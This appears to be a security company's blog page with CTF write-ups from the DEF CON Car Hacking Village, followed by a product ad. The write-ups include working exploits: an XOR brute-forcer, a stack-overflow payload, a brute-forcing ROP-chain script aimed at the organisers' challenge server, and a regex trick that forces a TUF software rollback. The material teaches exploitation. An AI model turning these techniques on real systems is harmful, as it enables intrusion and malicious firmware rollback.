

Red Balloon Security just wrapped up another trip to Las Vegas, Nevada, for DEF CON. This year, we brought three computer security challenges for the Car Hacking Village (CHV) Capture The Flag (CTF) competition.

Two of our challenges were geared towards beginners, and the third was intended to be more challenging. The three challenges gradually increased in difficulty, and were meant to be solved in order. All challenges could be found within the same firmware binary. In the end, the competition was fierce, and our challenges had several solves each.

The first challenge was a firmware unpacking problem with a cryptography component. The second challenge involved simple binary reverse engineering and exploitation. The third challenge featured much more advanced binary exploitation.

The third challenge was the highlight of our CTF work this year. It was built around Red Balloon’s recent research into system call (syscall) randomization. We took the system call numbers, and shuffled them in the syscall table in the kernel. We also changed every instance of a program making syscalls in userspace by walking the filesystem, statically analyzing, and finally patching executable binaries. We gave a talk about this syscall randomization research at ESCAR 2025.

The challenge itself involved exploiting a trivial buffer overflow in a userspace program. From there, a user could execute a ROP chain that would either let them read the flag directly, or run the mprotect syscall on a non-executable region that had code to print the flag, then branch there. Either way, participants needed a successful exploit and needed to find the syscall number for any call they wanted to use (by brute force, or using clever tricks).

In addition to the challenges in the CTF, we had a version of the syscall randomization challenge available with a $300 cash prize in $2 bills (it filled up a chalice on our table in the Car Hacking Village). Participants paid $1 into the jackpot to try their exploit, and the first successful solve won the whole pot. After some trial and error, and a lot of deliberating, a team of three was able to collect the cash.

Though it was also a fun way to draw interest and spice up the competition, the cash prize was designed to illustrate an important aspect of the challenge: system call randomization can make the act of exploiting a randomized system reduce to pure chance, even with a known vulnerability and exploit chain.

Challenge 1: XORry for being 4-getful

Challenge participants were given the following information:

- Challenge category: reversing, crypto

- Challenge description: I hope I removed everything I was supposed to before sending out the firmware. But if I forgot something, it’s encrypted anyway, so it’s probably fine.

- Intended difficulty: easy



In addition to the information above, participants were provided with a file called firmware.bin that was actually a ZIP containing a kernel image, a filesystem, and a run script.

firmware.bin

├── initrd

├── kernel

└── run.sh

#!/bin/sh
# We're running a challenge server that connects to a QEMU process like this
# one and runs the kernel and initrd. But the syscalls have been scrambled!
# See if you can get your exploits to run even though the system call table
# numbers are randomized in the kernel.
#
# There are several different images running on the server, each with a
# different set of randomized syscalls.
#
# To connect to the challenge server, do:
#   nc syscall-ctf.redballoonsecurity.com 9999
#
# Some amount of brute forcing may be necessary to get exploits using syscalls
# to work on the servers. Please be polite to other players.
qemu-system-aarch64 \
  -M virt \
  -cpu cortex-a57 \
  -nographic \
  -smp 1 \
  -m 512M \
  -kernel kernel \
  -initrd initrd \
  -append 'console=ttyAMA0 rw quiet'



















If we drop the original firmware.bin file into OFRAK, we find an interesting file in the initrd whose name seems to match with the challenge title:



When we actually look at the contents of the file, we can see that it contains gibberish, much of which is in printable ASCII range (we would expect less than 50% to be in this range for random bytes or a well-encrypted binary).
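As a rough check of that observation, the printable fraction of any byte string can be measured directly. This is a minimal sketch; the helper name `printable_fraction` is ours and is not part of OFRAK. Uniformly random bytes should land near 95/256 (about 37%), so a file that scores well above that is unlikely to be strongly encrypted.

```python
import os


def printable_fraction(data: bytes) -> float:
    """Return the fraction of bytes in the printable ASCII range 0x20-0x7E."""
    if not data:
        return 0.0
    printable = sum(1 for b in data if 0x20 <= b <= 0x7E)
    return printable / len(data)


# Baseline: random bytes, which stand in for well-encrypted data.
baseline = printable_fraction(os.urandom(1 << 16))
print(f"random bytes: {baseline:.1%} printable")

# To check a real file (the path is a placeholder for the extracted file):
# with open("path_to_encrypted.bin", "rb") as f:
#     print(f"{printable_fraction(f.read()):.1%} printable")
```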

The challenge information and filename hint that the file is encrypted with a repeating-key XOR. The following is a program (in Zig) that brute-forces repeating key XOR ciphertexts looking for printable ASCII text.

const std = @import("std");

var stdout: @typeInfo(@TypeOf(std.fs.File.writer)).@"fn".return_type.? = undefined;

var ciphertext: []u8 = undefined;

var key: []u8 = undefined;

var best_score: u32 = 0;

fn score_char(c: u8) u32 {

return switch (c) {

'A'...'Z', 'a'...'z' => 3,

' ', '0'...'9' => 2,

0x21...0x2F, 0x3A...0x40, 0x5B...0x60, 0x7B...0x7E => 1,

0x0...0x1F, 0x7F...0xFF => 0,

};

}

fn try_key(plaintext: []u8) !void {

var score: u32 = 0;

for (plaintext, ciphertext, 0..) |*p, c, i| {

p.* = c ^ key[i % key.len];

score += score_char(p.*);

}

if (score >= best_score) {

best_score = score;

try stdout.print("({s}) {s}\n---\n", .{ key, plaintext });

}

}

fn try_all_keys(depth: u8, plaintext: []u8) !void {

if (depth >= key.len) return try try_key(plaintext);

for (0..256) |c| {

key[depth] = @intCast(c);

try try_all_keys(depth + 1, plaintext);

}

}

pub fn main() !void {

stdout = std.io.getStdOut().writer();

var arena = std.heap.ArenaAllocator.init(std.heap.page_allocator);

defer arena.deinit();

const allocator = arena.allocator();

const args = try std.process.argsAlloc(allocator);

defer std.process.argsFree(allocator, args);

if (args.len <= 1) {

try stdout.print(

"Usage: {s} <binary file path or hex bytes>\n",

.{args[0]},

);

return;

}

ciphertext = std.fs.cwd().readFileAlloc(

allocator,

args[args.len - 1],

1024 * 1024 * 1024 * 4,

) catch fromhex: {

const cipher_hex = args[args.len - 1];

const c = try allocator.alloc(u8, cipher_hex.len / 2);

break :fromhex try std.fmt.hexToBytes(c, cipher_hex);

};

defer allocator.free(ciphertext);

const key_full = try allocator.alloc(u8, ciphertext.len);

defer allocator.free(key_full);

const plaintext = try allocator.alloc(u8, ciphertext.len);

defer allocator.free(plaintext);

for (1..ciphertext.len + 1) |key_length| {

key = key_full[0..key_length];

try try_all_keys(0, plaintext);

}

}

To run this code, we build it using Zig 0.14.1 with: zig build-exe -O ReleaseFast bruteforce.zig. After it is built, we can run it with ./bruteforce ./path_to_encrypted.bin.

There are some clever tricks that we could use to speed this up so it’s not pure brute force across all keys. But since we have it strongly implied from the challenge text that it’s a 4-byte repeating key XOR, we can just let it run for a while and keep the code simple.
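One such trick, sketched here in Python rather than Zig, is to solve each key byte independently: with a repeating key of length N, every Nth ciphertext byte shares the same key byte, so the search drops from 256^N keys to 256 × N candidates. The scoring tiers loosely mirror the Zig scorer above. The function names, the sample plaintext, and the sample key are our own illustrative choices, not part of the challenge.

```python
def score_byte(b: int) -> int:
    """Score one candidate plaintext byte: letters > space/digits > punctuation."""
    c = chr(b)
    if c.isascii() and c.isalpha():
        return 3
    if c == " " or (c.isascii() and c.isdigit()):
        return 2
    if 0x21 <= b <= 0x7E:
        return 1
    return 0


def recover_key(ciphertext: bytes, key_len: int) -> bytes:
    """Pick, for each key position, the byte that makes its column look most like text."""
    key = bytearray()
    for offset in range(key_len):
        column = ciphertext[offset::key_len]  # bytes that share one key byte
        best = max(range(256), key=lambda k: sum(score_byte(b ^ k) for b in column))
        key.append(best)
    return bytes(key)


def xor_repeating(data: bytes, key: bytes) -> bytes:
    """Apply a repeating-key XOR (the same call encrypts and decrypts)."""
    return bytes(b ^ key[i % len(key)] for i, b in enumerate(data))


if __name__ == "__main__":
    # Hypothetical demo data: a made-up key and plaintext, not the challenge file.
    demo_key = b"\xde\xad\xbe\xef"
    demo_plain = b"the quick brown fox jumps over the lazy dog" * 4
    demo_cipher = xor_repeating(demo_plain, demo_key)
    guessed = recover_key(demo_cipher, 4)
    print(guessed.hex(), xor_repeating(demo_cipher, guessed)[:43])
```

This approach needs enough ciphertext per key position for the scoring to be meaningful, so very short files may still call for the exhaustive search.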

Running it gives the following decrypted text:

Congratulations on decrypting the first part of the Red Balloon DEF CON CTF challenge at the car hacking village! Here is your flag:

flag{345y_keyzy_th1s_j0k3_i$_ch33zy}

Challenge 2: r0p 2 the t0p

- Challenge category: reversing, exploitation

- Challenge description: I left some code in my binary to read the flag, but nobody can get to it, right?

- Intended difficulty: easy/medium









In the unpacked firmware, we can use OFRAK to search the entire firmware for the flag prefix flag{. Doing so returns only one file: the init binary.





When we unpack the binary, there is one .text section – just one code region. Investigating that in OFRAK yields only a few functions.





Disassembling the code at 0x4000e4 gives a snippet that will print a flag. We can also view the decompiled function in OFRAK.

4000e4: e8 04 80 d2 mov x8, #39

4000e8: 20 00 80 d2 mov x0, #1

4000ec: 21 01 00 58 ldr x1, 0x400110 <.text+0x110>

4000f0: 42 06 80 d2 mov x2, #50

4000f4: 01 00 00 d4 svc #0

4000f8: c0 03 5f d6 ret

Disassembling the function at 0x400048 reveals a trivial stack buffer overflow vulnerability that we can exploit.

To change the control flow, and get the print flag function to execute, all we need to do is pass an input string large enough to overflow the buffer. Then the last few bytes of the input are the return address we want to overwrite on the stack so that control flow returns to the print flag function.

(
  sleep 4
  python3 -c '
import sys, struct;
sys.stdout.buffer.write(b"A" * 88 + struct.pack("<Q", 0x4000e4) + b"\n")
'
  sleep 1
) \
  | nc syscall-ctf.redballoonsecurity.com 9999 \
  | head -c 1024

This prints the flag.

Node ID: 50c925d7

Starting QEMU...

Welcome to RBS SCR CTF, Please input anything and it will echo back.

Input: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA^@@^@^@^@^@^@

AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA@

flag{S!mpl3_ROP_N0_ch@in_r3qu1red_4_SUCCess_!1!!!}flag{S!mpl3_ROP_N0_ch@in_r3qu1red_4_SUCCess_!1!!!}flag{S!mpl3_ROP_N0_ch@in_r3qu1red_4_SUCCess_!1!!!}flag{S!mpl3_ROP_N0_ch@in_r3qu1red_4_SUCCess_!1!!!}flag{S!mpl3_ROP_N0_ch@in_r3qu1red_4_SUCCess_!1!!!}flag{S!mpl3_ROP_N0_ch@in_r3qu1red_4_SUCCess_!1!!!}flag{S!mpl3_ROP_N0_ch@in_r3qu1red_4_SUCCess_!1!!!}flag{S!mpl3_ROP_N0_ch@in_r3qu1red_4_SUCCess_!1!!!}flag{S!mpl3_ROP_N0_ch@in_r3qu1red_4_SUCCess_!1!!!}flag{S!mpl3_ROP_N0_ch@in_r3qu1red_4_SUCCess_!1!!!}flag{S!mpl3_ROP_N0_ch@in_r3qu1red_4_SUCCess_!1!!!}flag{S!mpl3_ROP_N0_ch@in_r3qu1red_4_SUCCess_!1!!!}flag{S!mpl3_ROP_N0_ch@in_r3qu1red_4_SUCCess_!1!!!}flag{S!mpl3_ROP_N0_ch@in_r3qu1red_4_SUCCess_!1!!!}flag{S!mp%

- Challenge category: reversing, exploitation

- Challenge description: I left more code to read the flag, but it’s not marked executable, so there is no way anyone can run it, right? (A little brute force required)

- Intended difficulty: hard





Either using OFRAK or another disassembly tool, we notice that there is a non-executable section in the binary called .shellcode.

If we look at cross-references for the flag strings in the binary, the references to the first flag come from the function we jumped to in challenge 2 to print the flag. But the references to the second flag come from this non-executable section of code.

$ objdump -j .shellcode -d init

init: file format elf64-littleaarch64

Disassembly of section .shellcode:

0000000000402000 <.shellcode>:

402000: e8 04 80 d2 mov x8, #39

402004: 20 00 80 d2 mov x0, #1

402008: c1 00 00 58 ldr x1, 0x402020 <.shellcode+0x20>

40200c: 62 06 80 d2 mov x2, #51

402010: 01 00 00 d4 svc #0

402014: 08 00 80 92 mov x8, #-1

402018: 00 00 80 d2 mov x0, #0

40201c: 01 00 00 d4 svc #0

402020: 7e 10 40 00 <unknown>

402024: 00 00 00 00 udf #0

Disassembling this section, it appears to be very similar to the function we jumped to before, just with a different flag address. In order to jump here, we first need to mark the section as executable. To do this, we use a ROP chain to run the mprotect syscall. There is only one problem: the syscall numbers have been scrambled, and we don’t know which one corresponds to the mprotect syscall!

To find the mprotect syscall number, we will have to turn to brute force. There are several different randomized images on the server, and each time we connect, we get a different one. So instead of iterating the numbers and counting up until we hit the right one, we will just try a random number every time we connect until we get the flag.
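To get a feel for how long this kind of guessing takes, the arithmetic can be sketched as below. The model is our simplification, not a figure from the challenge authors: it assumes every connection is an independent guess drawn uniformly from 300 candidate numbers, exactly one of which is correct for the image we happen to reach. Under that assumption the number of connections follows a geometric distribution with a mean of 300 tries.

```python
import math


def success_probability(attempts: int, candidates: int = 300) -> float:
    """Chance that at least one of `attempts` independent uniform guesses is right."""
    return 1.0 - (1.0 - 1.0 / candidates) ** attempts


def attempts_for_confidence(confidence: float, candidates: int = 300) -> int:
    """Smallest number of guesses whose success probability reaches `confidence`."""
    miss = 1.0 - 1.0 / candidates
    return math.ceil(math.log(1.0 - confidence) / math.log(miss))


if __name__ == "__main__":
    for tries in (100, 300, 1000):
        print(f"{tries:5d} tries -> {success_probability(tries):.1%} chance of a hit")
    print("tries for 50% confidence:", attempts_for_confidence(0.5))
    print("tries for 95% confidence:", attempts_for_confidence(0.95))
```

Because each guess is independent, earlier failures do not shorten the remaining wait, which is why the live version of the challenge behaved like a lottery.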

#!/usr/bin/env python3
import random
import struct
import re
import time

from pwn import remote


def wait_for_input_prompt(conn):
    buffer = b""
    start_time = time.time()
    while time.time() - start_time < 30:
        data = conn.recv(1024, timeout=1)
        if not data:
            continue
        buffer += data
        if b"Input:" in buffer:
            return True
    return False


def build_rop_chain(sys_mprotect):
    TEXT_BASE = 0x400000
    SHELLCODE_BASE = 0x402000
    PAGE_SIZE = 0x1000
    PROT_RWX = 7

    gadgets = {
        'pop_x8': 0x4000c0,
        'pop_x0': 0x400090,
        'pop_x1': 0x4000a0,
        'pop_x2': 0x4000b0,
        'svc': 0x4000d0,
        'final_jump': 0x4000e0,
    }

    rop_chain = []
    rop_chain.append(gadgets['pop_x8'])
    rop_chain.append(sys_mprotect)
    rop_chain.append(gadgets['pop_x0'])
    rop_chain.append(SHELLCODE_BASE)
    rop_chain.append(gadgets['pop_x1'])
    rop_chain.append(PAGE_SIZE)
    rop_chain.append(gadgets['pop_x2'])
    rop_chain.append(PROT_RWX)
    rop_chain.append(gadgets['svc'])
    rop_chain.append(gadgets['pop_x0'])
    rop_chain.append(SHELLCODE_BASE)
    rop_chain.append(gadgets['final_jump'])
    return rop_chain


def build_payload():
    sys_mprotect = random.randint(1, 300)
    payload = b'A' * 88
    rop_chain = build_rop_chain(sys_mprotect)
    for addr in rop_chain:
        payload += struct.pack('<Q', addr)
    return payload


def main():
    while True:
        conn = remote('syscall-ctf.redballoonsecurity.com', 9999)
        if not wait_for_input_prompt(conn):
            print("Failed to get input prompt")
            conn.close()
            time.sleep(3)
            continue

        payload = build_payload()
        conn.send(payload + b"\n")
        time.sleep(1.0)

        try:
            response = conn.recv(1024, timeout=10)
            print(f"Response: {response}")
            time.sleep(0.2)
            if b'flag' in response:
                print("SUCCESS! Found flag")
                conn.close()
                break
        except:
            print("No response or timeout")
        conn.close()


if __name__ == "__main__":
    main()

Running this takes a little while, but eventually prints out a flag from a successful exploit:

[+] Opening connection to syscall-ctf.redballoonsecurity.com on port 9999: Done

Response: b'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\xc0^@@^@^@^@^@^@M^@^@^@^@^@^@^@\x90^@@^@^@^@^@^@^@ @^@^@^@^@^@\xa0^@@^@^@^@^@^@^@^P^@^@^@^@^@^@\xb0^@@^@^@^@^@^@^G^@^@^@^@^@^@^@\xd0^@@^@^@^@^@^@\x90^@@^@^@^@^@^@^@ @^@^@^@^@^@\xe0^@@^@^@^@^@^@\r\nAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\xc0\x00@\x00\x00\x00\x00\x00M\x00\x00\x00\x00\x00\x00\x00\x90\x00@\x00\x00\x00\x00\x00\x00 @\x00\x00\x00\x00\x00\xa0\x00@\x00\x00\x00\x00\x00\x00\x10\x00\x00\x00\x00\x00\x00\xb0\x00@\x00\x00\x00\x00\x00\x07\x00\x00\x00\x00\x00\x00\x00\xd0\x00@\x00\x00\x00\x00\x00\x90\x00@\x00\x00\x00\x00\x00\x00 @\x00\x00\x00\x00\x00\xe0\x00@\x00\x00\x00\x00\x00\r\nflag{ROP_ch4in_t0_m4k3_sh3llc0d3_3x3cut4bl3_4rm64}\r\n[ 2.539538] Kernel panic - not syncing: Attempted to kill init! exitcode=0x00000004\r\n[ 2.541702] CPU: 0 PID: 1 Comm: init Tainted: G W 5.10.192 #1\r\n[ 2.542050] Hardware name: linux,dummy-virt (DT)\r\n[ 2.542701] Call trace:\r\n[ 2.543788] dump_backtrace+0x0/0x1e0\r\n[ 2.544300] show_stack+0x30/0x40\r\n[ 2.544512] dump_stack+0xf0/0x130\r\n[ 2.544713] panic+0x1a4/0x38c\r\n[ 2.544898] do_exit+0xafc/0xb00\r\n[ 2.545063] do_group_exit+0x4c/0xb0\r\n[ 2.545240] get_signal+0x184/0x8c0\r\n['

SUCCESS! Found flag

[*] Closed connection to syscall-ctf.redballoonsecurity.com port 9999



In May 2025, Red Balloon Security released RASPUTIN, our advanced hardware reversing service platform. Combining automated processes with human oversight, RASPUTIN delivers efficient and accurate hardware analysis and firmware extraction.

Simplifying Hardware Reverse Engineering

Traditional hardware reverse engineering is often costly, time-consuming, and requires highly specialized expertise. RASPUTIN simplifies this through a “human-on-the-loop” approach, combining automated technology with expert guidance to streamline and enhance hardware reversing tasks.

How RASPUTIN Works

RASPUTIN leverages robotics, software-defined instrumentation, and analytical software to optimize hardware reversing:

- Detection & Extraction: Quickly identifies and interfaces with embedded chips to automate firmware data extraction.

- Hardware Analysis: Reverse engineering of PCB design, anti-tampering measures, and failure analysis.

- Firmware Analysis: Promptly analyzes extracted firmware to identify vulnerabilities.

- Adaptive Automation: Integrates human oversight to effectively manage unexpected scenarios or specific technical challenges.

How to use RASPUTIN

RASPUTIN addresses diverse hardware security needs, including:

- Supply Chain Risk Management: Automated imaging and firmware extraction to detect hardware tampering and counterfeit components.

- Device Investigations: Efficient forensic analyses of compromised or suspicious hardware to gather actionable insights.

- Adversarial Hardware Reverse Engineering: Automates identification and firmware recovery from adversarial embedded systems.

- Custom Automated Workflows: Tailors automated processes for probing, scanning, and extraction, enhancing internal assessments.

- Electromagnetic Fault Testing: Uses electromagnetic analysis to identify and address vulnerabilities.

Apply For Beta Access Today

Discover how RASPUTIN can support your hardware security operations. Schedule a demonstration or request more details by contacting us at [email protected].

Red Balloon Security recently returned from the DEF CON hacking conference in Las Vegas, where, among other activities, we brought two computer security challenges to the Car Hacking Village (CHV) Capture The Flag (CTF) competition. The grand prize for the competition was a 2021 Tesla, and second place was several thousand dollars of NXP development kits, so we wanted to make sure our challenge problems were appropriately difficult. This competition was also a “black badge CTF” at DEF CON, which means the winners are granted free entrance to DEF CON for life.

The goal of our challenges was to force competitors to learn about secure software updates and The Update Framework (TUF), which is commonly used for securing software updates. We originally wanted to build challenge problems around defeating Uptane, an automotive-specific variant of TUF, however, there is no well-supported, public version of Uptane that we could get working, so we built the challenges around Uptane’s more general ancestor TUF instead. Unlike Uptane, TUF is well-supported with several up-to-date, maintained, open source implementations.

Our two CTF challenges were designed to be solved in order – the first challenge had to be completed to begin the second. Both involved circumventing the guarantees of TUF to perform a software rollback.

Besides forcing competitors to learn the ins and outs of TUF, the challenges were designed to impress upon them that software update frameworks like TUF are only secure if they are used properly, and if they are used with secure cryptographic keys. If either of these assumptions is violated, the security of software updates can be compromised.

Both challenges ran on a Rivain Telematics Control Module (TCM) at DEF CON.

Challenge 1: Secure Updates are TUF

Challenge participants were given the following information:

- Category: exploitation, reverse engineering

- Description: I set up secure software updates using TUF. That way nobody can do a software rollback! Right? To connect, join the network and run:

nc 172.28.2.64 8002

- Intended Difficulty: easy

- Solve Criteria: found flag

- Tools Required: none

In addition to the description above, participants were given a tarball with the source of the software update script using the python-tuf library, and the TUF repository with the signed metadata and update files served over HTTP to the challenge server, which acts as a TUF client.

The run.sh script to start up the TUF server and challenge server:

#!/bin/sh
set -euxm

# tuf and cryptography dependencies installed in virtual environment
source ~/venv/bin/activate

(python3 -m http.server --bind 0 --directory repository/ 38001 2>&1) | tee /tmp/web_server.log &

while sleep 3; do
  python3 challenge_server.py --tuf-server http://localhost:38001 --server-port 38002 || fg
done

The main challenge_server.py:

#!/usr/bin/env -S python3 -u
"""
Adapted from:
https://github.com/theupdateframework/python-tuf/tree/f8deca31ccea22c30060f259cb7ef2588b9c6baa/examples/client
"""

import argparse
import inspect
import json
import os
import re
import socketserver
import sys
from urllib import request

from tuf.ngclient import Updater


def parse_args():
    parser = argparse.ArgumentParser()
    for parameter in inspect.signature(main).parameters.values():
        if parameter.name.startswith("_"):
            continue
        if "KEYWORD" in parameter.kind.name:
            parser.add_argument(
                "--" + parameter.name.replace("_", "-"),
                default=parameter.default,
            )
    return parser.parse_args()


def semver(s):
    return tuple(s.lstrip("v").split("."))


def name_matches(name, f):
    return re.match(name, f)


def readline():
    result = []
    c = sys.stdin.read(1)
    while c != "\n":
        result.append(c)
        c = sys.stdin.read(1)
    result.append(c)
    return "".join(result)


class Handler(socketserver.BaseRequestHandler):
    def __init__(self, *args, tuf_server=None, updater=None, **kwargs):
        self.tuf_server = tuf_server
        self.updater = updater
        super().__init__(*args, **kwargs)

    def handle(self):
        self.request.settimeout(10)
        os.dup2(self.request.fileno(), sys.stdin.fileno())
        os.dup2(self.request.fileno(), sys.stdout.fileno())

        print("Welcome to the firmware update admin console!")
        print("What type of firmware would you like to download from the TUF server?")
        print(
            "Whichever type you pick, we will pull the latest version from the server."
        )
        print("Types:")
        with request.urlopen(f"{self.tuf_server}/targets.json") as response:
            targets = json.load(response)
        all_target_files = list(targets["signed"]["targets"].keys())
        print("-", "\n- ".join({file.split("_")[0] for file in all_target_files}))

        print("Enter type name: ")
        name = readline().strip()
        if "." in name:
            # People were trying to bypass our version check with regex tricks! Not allowed!
            print("Not allowed!")
            return
        filenames = list(
            sorted(
                [f for f in all_target_files if name_matches(name, f)],
                key=lambda s: semver(s),
            )
        )
        if len(filenames) == 0:
            print("Sorry, file not found!")
            return
        filename = filenames[-1]

        print(f"Downloading {filename}")
        info = self.updater.get_targetinfo(filename)
        if info is None:
            print("Sorry, file not found!")
            return
        with open("/dev/urandom", "rb") as f:
            name = f.read(8).hex()
        path = self.updater.download_target(
            info,
            filepath=f"/tmp/{name}.{os.path.basename(info.path)}",
        )
        os.chmod(path, 0o755)

        print(f"Running {filename}")
        child = os.fork()
        if child == 0:
            os.execl(path, path)
        else:
            os.wait()
            os.remove(path)


def main(tuf_server="http://localhost:8001", server_port="8002", **_):
    repo_metadata_dir = "/tmp/tuf_server_metadata"
    if not os.path.isdir(repo_metadata_dir):
        if os.path.exists(repo_metadata_dir):
            raise RuntimeError(
                f"{repo_metadata_dir} already exists and is not a directory"
            )
        os.mkdir(repo_metadata_dir)
    with request.urlopen(f"{tuf_server}/root.json") as response:
        root = json.load(response)
    with open(f"{repo_metadata_dir}/root.json", "w") as f:
        json.dump(root, f, indent=2)

    updater = Updater(
        metadata_dir=repo_metadata_dir,
        metadata_base_url=tuf_server + "/metadata/",
        target_base_url=tuf_server + "/targets/",
    )
    updater.refresh()

    def return_handler(*args, **kwargs):
        return Handler(*args, **kwargs, tuf_server=tuf_server, updater=updater)

    print("Running server")
    with socketserver.ForkingTCPServer(
        ("0", int(server_port)), return_handler
    ) as server:
        server.serve_forever()


if __name__ == "__main__":
    main(**parse_args().__dict__)

Also included were TUF-tracked files tcmupdate_v0.{2,3,4}.0.py.

The challenge server waits for TCP connections. When one is made, it prompts for a software file to download. Then it checks the TUF server for all versions of that file (using the user input in a regular expression match), and picks the latest based on parsing its version string (for example filename_v0.3.0.py parses to (0, 3, 0) ). Once it has found the latest file, it downloads it using the TUF client functionality from the TUF library.

The goal of this challenge is to roll back from version 0.4.0 to version 0.3.0. The key to solving this challenge is to notice the following code:

# ...

def semver(s):
    return tuple(s.lstrip("v").split("."))

def name_matches(name, f):
    return re.match(name, f)

def handle_tcp():
    # ...
    name = readline().strip()
    if "." in name:
        # People were trying to bypass our version check with regex tricks! Not allowed!
        print("Not allowed!")
        return
    filenames = list(
        sorted(
            [f for f in all_target_files if name_matches(name, f)],
            key=lambda s: semver(s),
        )
    )
    if len(filenames) == 0:
        print("Sorry, file not found!")
        return
    filename = filenames[-1]
    # ...

This code first filters using the regular expression, then sorts based on the version string to find the latest matching file. Notably, the name input is used directly as a regular expression.

To circumvent the logic for only downloading the latest version of a file, we can pass an input regular expression that filters out everything except for the version we want to run. Our first instinct might be to use a regular expression like the following:

tcmupdate.*0\.3\.0.*

If we try that, however, we hit the case where any input including a . character is blocked. We now need to rewrite the regular expression to match only tcmupdate_v0.3.0, but without including the . character. One of many possible solutions is:

tcmupdate_v0[^a]3[^a]0

Since the . literal is a character that is not a, the [^a] expression will match it successfully without including it directly. This input gives us the flag.
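The filter-then-sort behavior can be reproduced offline without a TUF server. The sketch below copies `semver` from the challenge source and wraps the selection logic in a helper we call `pick` (a hypothetical name), run against the three tracked filenames. One thing it makes visible: as written, `semver` returns string components such as `"tcmupdate_v0"` and `"3"` rather than integers, so the ordering is a lexicographic comparison of those strings.

```python
import re

# The three TUF-tracked targets named in the challenge files.
TARGETS = ["tcmupdate_v0.2.0.py", "tcmupdate_v0.3.0.py", "tcmupdate_v0.4.0.py"]


def semver(s):
    # Copied from challenge_server.py: splits on "." and keeps strings.
    return tuple(s.lstrip("v").split("."))


def pick(name, files):
    """Mimic the server: reject dots, regex-filter, then take the 'latest' match."""
    if "." in name:
        return None  # the server prints "Not allowed!" here
    matches = sorted([f for f in files if re.match(name, f)], key=semver)
    return matches[-1] if matches else None


if __name__ == "__main__":
    for user_input in ("tcmupdate", r"tcmupdate.*0\.3\.0.*", "tcmupdate_v0[^a]3[^a]0"):
        print(repr(user_input), "->", pick(user_input, TARGETS))
```

Because `re.match` only anchors at the start of the string, a shorter prefix pattern that stops matching 0.2.0 and 0.4.0 is enough to select the 0.3.0 file.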

flag{It_T4ke$-More-Than_just_TUF_for_secure_updates!}

Challenge 2: One Key to Root Them All

Challenge participants were given the following information:

- Name: One Key to Root Them All

- Submitter: Jacob Strieb @ Red Balloon Security

- Category: crypto, exploitation

- Description: Even if you roll back to an old version, you’ll never be able to access the versions I have overwritten! TUF uses crypto, so it must be super secure. You will need to have solved the previous challenge to progress to this one. To connect, join the network and run:

nc 172.28.2.64 8002

- Intended Difficulty: shmedium to hard

- Solve Criteria: found flag

- Tools Required: none

Challenge 2 can only be attempted once challenge 1 has been completed. When challenge 1 is completed, it runs tcmupdate_v0.3.0.py on the target TCM. This prompts the user for a new TUF server address to download files from, and a new filename to download and run. The caveat is that the metadata from the original TUF server is already trusted locally, so attempts to download from a TUF server with new keys will be rejected.

In the challenge files repository/targets subdirectory, there are two versions of tcmupdate_v0.2.0.py. One of them is tracked by TUF, the other is no longer tracked by TUF. The goal is to roll back to the old version of tcmupdate_v0.2.0.py that has been overwritten and is no longer a possible target to download with the TUF downloader.

The challenge files look like this:

ctf/

├── challenge_server.py

├── flag_1.txt

├── flag_2.txt

├── repository

│ ├── 1.root.json

│ ├── 1.snapshot.json

│ ├── 1.targets.json

│ ├── 2.snapshot.json

│ ├── 2.targets.json

│ ├── metadata -> .

│ ├── root.json

│ ├── snapshot.json

│ ├── targets

│ │ ├── 870cba60f57b8cbee2647241760d9a89f3c91dba2664467694d7f7e4e6ffaca588f8453302f196228b426df44c01524d5c5adeb2f82c37f51bb8c38e9b0cc900.tcmupdate_v0.2.0.py

│ │ ├── 9bbef34716da8edb86011be43aa1d6ca9f9ed519442c617d88a290c1ef8d11156804dcd3e3f26c81e4c14891e1230eb505831603b75e7c43e6071e2f07de6d1a.tcmupdate_v0.2.0.py

│ │ ├── 481997bcdcdf22586bc4512ccf78954066c4ede565b886d9a63c2c66e2873c84640689612b71c32188149b5d6495bcecbf7f0d726f5234e67e8834bb5b330872.tcmupdate_v0.3.0.py

│ │ └── bc7e3e0a6ec78a2e70e70f87fbecf8a2ee4b484ce2190535c045aea48099ba218e5a968fb11b43b9fcc51de5955565a06fd043a83069e6b8f9a66654afe6ea57.tcmupdate_v0.4.0.py

│ ├── targets.json

│ └── timestamp.json

├── requirements.txt

└── run.sh

The latest version of the TUF targets.json file is only tracking the 9bbef3... hash version of the tcmupdate_v0.2.0.py file.

{

"signed": {

"_type": "targets",

"spec_version": "1.0",

"version": 2,

"expires": "2024-10-16T21:11:07Z",

"targets": {

"tcmupdate_v0.2.0.py": {

"length": 54,

"hashes": {

"sha512": "9bbef34716da8edb86011be43aa1d6ca9f9ed519442c617d88a290c1ef8d11156804dcd3e3f26c81e4c14891e1230eb505831603b75e7c43e6071e2f07de6d1a"

}

},

"tcmupdate_v0.3.0.py": {

"length": 1791,

"hashes": {

"sha512": "481997bcdcdf22586bc4512ccf78954066c4ede565b886d9a63c2c66e2873c84640689612b71c32188149b5d6495bcecbf7f0d726f5234e67e8834bb5b330872"

}

},

"tcmupdate_v0.4.0.py": {

"length": 125,

"hashes": {

"sha512": "bc7e3e0a6ec78a2e70e70f87fbecf8a2ee4b484ce2190535c045aea48099ba218e5a968fb11b43b9fcc51de5955565a06fd043a83069e6b8f9a66654afe6ea57"

}

}

}

},

"signatures": [

{

"keyid": "f1f66ca394996ea67ac7855f484d9871c8fd74e687ebab826dbaedf3b9296d14",

"sig": "1bc2be449622a4c2b06a3c6ebe863fad8d868daf78c1e2c2922a2fe679a529a7db9a0888cd98821a66399fd36a4d5803d34c49d61b21832ff28895931539c1cca118b299c995bcd1f7b638803da481cf253e88f4e80d62e7abcc39cc92899cc540be901033793fae9253f41008bc05f70d93ef569c0d6c09644cd7dfb758c2b71e2332de7286d15cc894a51b6a6363dcde5624c68506ea54a426f7ae9055f01760c6d53f4f4f68589d89f31a01e08d45880bc28a279f8621d97ab7223c4d41ecb077176af5dd27d5c07379d99898020b23cd733e"

}

]

}



